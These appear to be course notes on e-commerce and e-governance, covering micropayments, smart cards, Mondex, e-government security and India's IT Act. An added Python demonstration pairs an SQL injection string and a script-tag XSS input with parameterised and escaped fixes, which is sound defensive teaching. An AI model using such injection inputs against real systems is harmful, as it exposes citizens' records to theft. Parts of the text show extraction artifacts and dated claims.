With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayments are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before seeing a return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by Visa™ and MasterCard SecureCode™).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal account and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing
Marketing
Software
Entertainment
Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized, with a microchip embedded on it
Two types: memory-only chips and microprocessor chips
Can hold up to 32,000 bytes
Newer smart cards have math co-processors, which perform complex encryption routines quickly
In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –

Why Smart Cards –

Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats

Advantages –

Flexibility
Security
Portability
Increasing data storage capacity
Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications –

Ticketless travel
Seoul bus system: 4M cards, 1B transactions since 1996
Planned for the SF Bay Area system
Authentication, ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks, etc.
Keep transaction records
Password protection and "lock card" functions
Portable balance finder to check balance
Support multiple currencies

ADVANTAGES

CONSUMER –

Convenience
Accessibility
On-chip record of recent transactions
Home load
Internet purchases

MERCHANT –

Reliable off-line payment
Higher security
Low transaction cost
Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships
New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card, you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.
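The rolling on-card transaction log and the overflow problem described above, as an added simulation that is not part of the original notes or of the real Mondex system. The MondexStyleCard and BankReconciler classes, the 10-entry log (the "rolling 10 transactions" mentioned earlier) and the per-card sequence counter the bank uses to notice a gap are assumptions made for the demo; the bank can detect that entries were lost, but cannot recover them.

```python
from collections import deque


class MondexStyleCard:
    """Constructed model of a stored-value card: a balance, a monotonic
    transaction counter and a rolling log that keeps only the last LOG_SIZE
    entries, so older entries are overwritten before the next upload."""

    LOG_SIZE = 10

    def __init__(self, card_id: str, balance_cents: int):
        self.card_id = card_id
        self.balance_cents = balance_cents
        self.counter = 0                          # never reset in this model
        self.log = deque(maxlen=self.LOG_SIZE)    # oldest entry silently dropped

    def _record(self, kind, amount_cents, counterparty):
        self.counter += 1
        self.log.append({"seq": self.counter, "kind": kind,
                         "amount_cents": amount_cents, "counterparty": counterparty})

    def pay(self, other: "MondexStyleCard", amount_cents: int) -> bool:
        """Offline card-to-card transfer; no bank is contacted."""
        if amount_cents <= 0 or amount_cents > self.balance_cents:
            return False
        self.balance_cents -= amount_cents
        other.balance_cents += amount_cents
        self._record("debit", amount_cents, other.card_id)
        other._record("credit", amount_cents, self.card_id)
        return True

    def upload(self):
        """What the bank can retrieve at the next ATM visit: only what survived."""
        return list(self.log)


class BankReconciler:
    """Bank side. Remembers the last sequence number seen per card, skips
    entries it already holds and flags a gap, which means entries were
    overwritten on the card before they could be uploaded."""

    def __init__(self):
        self.last_seq = {}
        self.ledger = []

    def ingest(self, card: MondexStyleCard):
        expected = self.last_seq.get(card.card_id, 0) + 1
        new = [e for e in card.upload() if e["seq"] >= expected]  # drop re-uploads
        missing = new[0]["seq"] - expected if new else 0
        self.ledger.extend((card.card_id, e) for e in new)
        if new:
            self.last_seq[card.card_id] = new[-1]["seq"]
        return {"card": card.card_id, "uploaded": len(new),
                "lost_to_overflow": max(missing, 0),
                "needs_fraud_review": missing > 0}


def demo():
    """Twelve offline purchases of 1.00 before the card reaches an ATM."""
    customer = MondexStyleCard("CARD-A", balance_cents=5000)   # constructed ids
    retailer = MondexStyleCard("CARD-R", balance_cents=0)
    bank = BankReconciler()
    for _ in range(12):
        customer.pay(retailer, 100)
    return bank.ingest(customer)      # only the last 10 entries survived


if __name__ == "__main__":
    print(demo())
```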

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B), government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with making this definition congruent with a definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services, like transactions, database management, messaging and naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, public key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving
– Long Term Contracts
– User Charges and/or Payments flowing between the Parties
– Shared Investments, but Mainly Private
– Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market

The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

Shared goals
Shared resources (time, money, expertise, people)
Shared risks
Shared benefits

Benefits

Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital

Two Major Steps

Crafting the Partnership
Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis
What's the need?
What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
Is there a need for a Public/Private Partnership?

Preliminary Project Definition
Feasibility: Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
Market Research
Economic/Financial Analysis
Program, Budget and Schedule
Risk Analysis

Plan and Test
Final project definition
What is the best way to complete the project?
Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
Master Schedule/Budget
Political Climate
Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
How do you choose and contract with the best-value private partner?
What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
What do current statutes allow?
Procurement Approach: Sole Source, RFP, Low Bid
Risk Allocation between Public and Private Partners
Structuring of Contract/Risks and Rewards

Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration

Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms) and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government

The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service

2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens

The process approach for information security management system ISMS encourages its users to emphasize the importance of

understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security

implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks

monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement

Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event

Example of organizational and technical measures to prevent unauthorized access and processing are shown

Protecting premises equipment and systems software including input-output units

PREPARED BY ARUN PRATAP SINGH 53

53

Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including

transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of

personal data Enabling subsequent determination of when individual personal data were entered into a

filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been adequately addressed: as the UN 2012 Survey shows, only 20 of the national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public-organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques such as packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

continually improve its control environment;

effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, yet e-Government websites are still vulnerable. A research work found that 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
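To make the two vulnerabilities named above concrete from the defender's side, here is an added example in Python (not code from the original notes or from the cited research): a citizen-lookup query written with string concatenation beside its parameterised form, and a welcome page that reflects a name unescaped beside one that HTML-encodes it. The `citizens` table, the logins and the hostile inputs are constructed for the demonstration.

```python
import html
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a citizen portal's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (login TEXT, name TEXT, tax_id TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", [
        ("asha", "Asha Rao", "TAX-0001"),
        ("bala", "Bala Iyer", "TAX-0002"),
    ])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, login: str) -> list:
    """SQL injection: the login value is pasted into the SQL text, so a value
    containing quotes and operators changes the query instead of being compared."""
    sql = "SELECT login, name, tax_id FROM citizens WHERE login = '" + login + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn: sqlite3.Connection, login: str) -> list:
    """Parameterised query: the value travels separately from the SQL text and
    can only ever be compared as data, never parsed as SQL."""
    sql = "SELECT login, name, tax_id FROM citizens WHERE login = ?"
    return conn.execute(sql, (login,)).fetchall()

def render_vulnerable(name: str) -> str:
    """Reflected XSS: user-controlled text is copied straight into the HTML,
    so any markup it contains is interpreted by the browser."""
    return "<p>Welcome, " + name + "</p>"

def render_safe(name: str) -> str:
    """Output encoding: html.escape turns <, >, &, and quotes into entities,
    so the browser renders them as literal text."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"

def demo() -> dict:
    conn = make_db()
    # Constructed hostile inputs of the kind a web-application scanner reports.
    injected_login = "x' OR '1'='1"
    scripted_name = "<script>alert(1)</script>"
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, injected_login)),  # whole table leaks
        "safe_rows": len(lookup_safe(conn, injected_login)),              # no such login
        "vulnerable_html": render_vulnerable(scripted_name),
        "safe_html": render_safe(scripted_name),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two safe variants are the standard mitigations for the two findings: bind parameters for every value that reaches the database, and encode every value at the point where it is written into HTML.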

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

121 million Internet users;

65 million active Internet users, up 28 per cent from 51 million in 2010;

50 million users shop online on e-commerce and online shopping sites;

46+ million social network users;

346 million mobile users had subscribed to data packages.


CYBER LAW

(1) Whoever with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

secures access;

downloads, copies or extracts any data, computer database or any information;

introduces or causes to be introduced any virus or contaminant;

disrupts or causes disruption;

denies or causes denial of access to any person;

provides any assistance to any person to facilitate access;

charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S. 66]

S. 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

any information that is grossly offensive or has menacing character; or

any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device; or

any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S. 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S. 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S. 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S. 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S. 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offenses and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 – Hacking. Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


How the merchant and the payment gateway can verify the DS

The merchant is provided with OI, H[PI] and DS.

The dual signature can be verified as follows:

Step 1: The merchant first finds

H[ H[PI] || H[OI] ]

Step 2: He then decrypts the digital signature with the cardholder's public signature key, as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

